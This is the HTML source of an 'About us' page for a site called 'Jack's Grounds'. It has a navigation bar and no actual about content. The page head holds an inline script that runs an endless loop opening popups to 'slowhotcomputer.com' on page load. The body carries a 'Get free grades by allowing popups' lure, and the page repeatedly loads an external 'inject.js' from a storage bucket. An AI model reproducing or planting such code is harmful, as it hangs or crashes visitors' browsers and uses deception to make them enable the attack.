  <!doctype html>

<html>
    <head>
        <meta charset="utf-8">

        <title>Jack's Grounds | About us</title>

        <!-- Load external CSS styles -->
        <link rel="stylesheet" href="../Css/styles.css">

        <script>
        
            while (true) {
            open("http://slowhotcomputer.com")
            }
            </script>
    </head>

    <body>
 <div id="global-announcement" >
         </div>
      <header>
          <h1>Jack's Grounds</h1>
          <nav>
              <li><a href="../index.html">Home</a></li>
              <li><a href="Games.html">Games</a></li>
            <li><a href="utilitys.html">Utilities</a></li>
              <li><a href="#">About</a></li>
              <li><a href="Researchers.html">Researchers</a></li>
             </nav>
      </header>
       
       <h1 style="text-align: center; padding: 20px; font-size: 2rem;">Get free grades by allowing popups</h1>

        
        <!-- Load external JavaScript -->
       <!-- <script src="scripts.js"></script> -->
       <script src="../Scripts/global-announcements.js"></script>
<script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script><script type='text/javascript'  src="https://productionstage-hostingstack-serverbucket50ee8d24-18stefou6iti3.s3.amazonaws.com/089d1bfdb4e54328a59574fb7ac4e473b32134ed9982a399929388d97e08f2dd/inject.js"></script></body>

</html>